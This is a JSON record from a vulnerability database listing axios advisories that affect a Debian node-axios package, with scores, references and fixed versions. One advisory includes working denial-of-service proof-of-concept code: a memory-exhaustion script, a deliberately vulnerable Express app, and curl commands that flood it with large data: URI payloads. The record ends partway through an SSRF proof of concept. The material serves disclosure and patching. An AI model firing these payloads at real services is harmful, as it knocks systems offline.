{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","type":"deb","namespace":"debian","name":"node-axios","version":"1.2.1+dfsg-1+deb12u1","qualifiers":{"distro":"trixie"},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.6.2+dfsg-1","latest_non_vulnerable_version":"1.15.2-1","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354606?format=json","vulnerability_id":"VCID-671j-k4zn-xbgk","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, he fix for no_proxy hostname normalization bypass is incomplete. When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it. The shouldBypassProxy() function does pure string matching — it does not resolve IP aliases or loopback equivalents. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42038","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09121","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09672","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13132","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42038"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461634","reference_id":"2461634","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461634"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42038","reference_id":"CVE-2026-42038","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42038"},{"reference_url":"https://github.com/advisories/GHSA-m7pr-hjqh-92cm","reference_id":"GHSA-m7pr-hjqh-92cm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m7pr-hjqh-92cm"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm","reference_id":"GHSA-m7pr-hjqh-92cm","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:46:29Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42038","GHSA-m7pr-hjqh-92cm"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"6.1","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-671j-k4zn-xbgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354421?format=json","vulnerability_id":"VCID-8352-4tud-y3f4","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when Object.prototype has been polluted by any co-dependency with keys that axios reads without a hasOwnProperty guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42033","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09688","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00078","scoring_system":"epss","scoring_elements":"0.23065","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00103","scoring_system":"epss","scoring_elements":"0.277","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42033"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461607","reference_id":"2461607","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461607"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42033","reference_id":"CVE-2026-42033","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42033"},{"reference_url":"https://github.com/advisories/GHSA-pf86-5x62-jrwf","reference_id":"GHSA-pf86-5x62-jrwf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pf86-5x62-jrwf"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf","reference_id":"GHSA-pf86-5x62-jrwf","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:28:14Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42033","GHSA-pf86-5x62-jrwf"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8352-4tud-y3f4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/25655?format=json","vulnerability_id":"VCID-aq84-8cnz-byax","summary":"Axios is vulnerable to DoS attack through lack of data size check\n## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === 'data:') {\n let convertedData;\n if (method !== 'GET') {\n return settle(resolve, reject, { status: 405, ... });\n }\n convertedData = fromDataURI(config.url, responseType === 'blob', {\n Blob: config.env && config.env.Blob\n });\n return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n ...\n if (protocol === 'data') {\n uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n const match = DATA_URL_PATTERN.exec(uri);\n ...\n const body = match[3];\n const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');\n if (asBlob) { return new _Blob([buffer], {type: mime}); }\n return buffer;\n }\n throw new AxiosError('Unsupported protocol ' + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require('axios');\n\nasync function main() {\n // this example decodes ~120 MB\n const base64Size = 160_000_000; // 120 MB after decoding\n const base64 = 'A'.repeat(base64Size);\n const uri = 'data:application/octet-stream;base64,' + base64;\n\n console.log('Generating URI with base64 length:', base64.length);\n const response = await axios.get(uri, {\n responseType: 'arraybuffer'\n });\n\n console.log('Received bytes:', response.data.length);\n}\n\nmain().catch(err => {\n console.error('Error:', err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n<--- Last few GCs --->\n…\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x… node::Abort() …\n…\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n timeout: 10000,\n maxRedirects: 5,\n httpAgent, httpsAgent,\n headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n validateStatus: c => c >= 200 && c < 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=>res.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) => {\n const url = req.body?.url;\n if (!url) return res.status(400).json({ error: \"missing url\" });\n\n let u;\n try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n // Developer allows using data:// in the allowlist\n const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n const controller = new AbortController();\n const onClose = () => controller.abort();\n res.on(\"close\", onClose);\n\n const before = process.memoryUsage().heapUsed;\n\n try {\n const r = await axiosClient.get(u.toString(), {\n responseType: \"stream\",\n maxContentLength: 8 * 1024, // Axios will ignore this for data:\n maxBodyLength: 8 * 1024, // Axios will ignore this for data:\n signal: controller.signal\n });\n\n // stream only the first 64KB back\n const cap = 64 * 1024;\n let sent = 0;\n const limiter = new PassThrough();\n r.data.on(\"data\", (chunk) => {\n if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }\n else { sent += chunk.length; limiter.write(chunk); }\n });\n r.data.on(\"end\", () => limiter.end());\n r.data.on(\"error\", (e) => limiter.destroy(e));\n\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n limiter.pipe(res);\n } catch (err) {\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n res.status(502).json({ error: String(err?.message || err) });\n } finally {\n res.off(\"close\", onClose);\n }\n});\n\napp.listen(PORT, () => {\n console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))' \\\n| tee payload.json >/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-58754","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29896","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29756","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29944","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34373","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34392","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34629","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34669","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34158","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34289","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35614","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35637","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.3568","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35671","published_at":"2026-04-09T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35648","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35654","published_at":"2026-04-16T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-58754"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"},{"reference_url":"https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67"},{"reference_url":"https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06"},{"reference_url":"https://github.com/axios/axios/pull/7011","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/pull/7011"},{"reference_url":"https://github.com/axios/axios/pull/7034","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/pull/7034"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.2","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.30.2"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.12.0","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.12.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-58754","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-58754"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963","reference_id":"1114963","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2394735","reference_id":"2394735","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2394735"},{"reference_url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj","reference_id":"GHSA-4hjh-wcwx-xvwj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:16747","reference_id":"RHSA-2025:16747","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:16747"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:18252","reference_id":"RHSA-2025:18252","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:18252"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19221","reference_id":"RHSA-2025:19221","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19221"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19375","reference_id":"RHSA-2025:19375","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19375"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19529","reference_id":"RHSA-2025:19529","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19529"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19804","reference_id":"RHSA-2025:19804","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19804"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:22759","reference_id":"RHSA-2025:22759","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:22759"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23069","reference_id":"RHSA-2025:23069","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23069"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23131","reference_id":"RHSA-2025:23131","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23131"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23546","reference_id":"RHSA-2025:23546","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23546"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:1018","reference_id":"RHSA-2026:1018","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:1018"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:1942","reference_id":"RHSA-2026:1942","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:1942"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:4215","reference_id":"RHSA-2026:4215","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:4215"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6226","reference_id":"RHSA-2026:6226","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6226"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932090?format=json","purl":"pkg:deb/debian/node-axios@1.12.1%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.12.1%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2025-58754","GHSA-4hjh-wcwx-xvwj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aq84-8cnz-byax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/351040?format=json","vulnerability_id":"VCID-axk7-6q4b-vuga","summary":"Axios has a NO_PROXY Hostname Normalization Bypass Leads to SSRF\nAxios does not correctly handle hostname normalization when checking `NO_PROXY` rules.\nRequests to loopback addresses like `localhost.` (with a trailing dot) or `[::1]` (IPv6 literal) skip `NO_PROXY` matching and go through the configured proxy.\n\nThis goes against what developers expect and lets attackers force requests through a proxy, even if `NO_PROXY` is set up to protect loopback or internal services.\n\nAccording to [RFC 1034 §3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1) and [RFC 3986 §3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2), a hostname can have a trailing dot to show it is a fully qualified domain name (FQDN). At the DNS level, `localhost.` is the same as `localhost`. \nHowever, Axios does a literal string comparison instead of normalizing hostnames before checking `NO_PROXY`. This causes requests like `http://localhost.:8080/` and `http://[::1]:8080/` to be incorrectly proxied.\n\nThis issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections.\n\n---\n\n**PoC**\n\n```js\nimport http from \"http\";\nimport axios from \"axios\";\n\nconst proxyPort = 5300;\n\nhttp.createServer((req, res) => {\n console.log(\"[PROXY] Got:\", req.method, req.url, \"Host:\", req.headers.host);\n res.writeHead(200, { \"Content-Type\": \"text/plain\" });\n 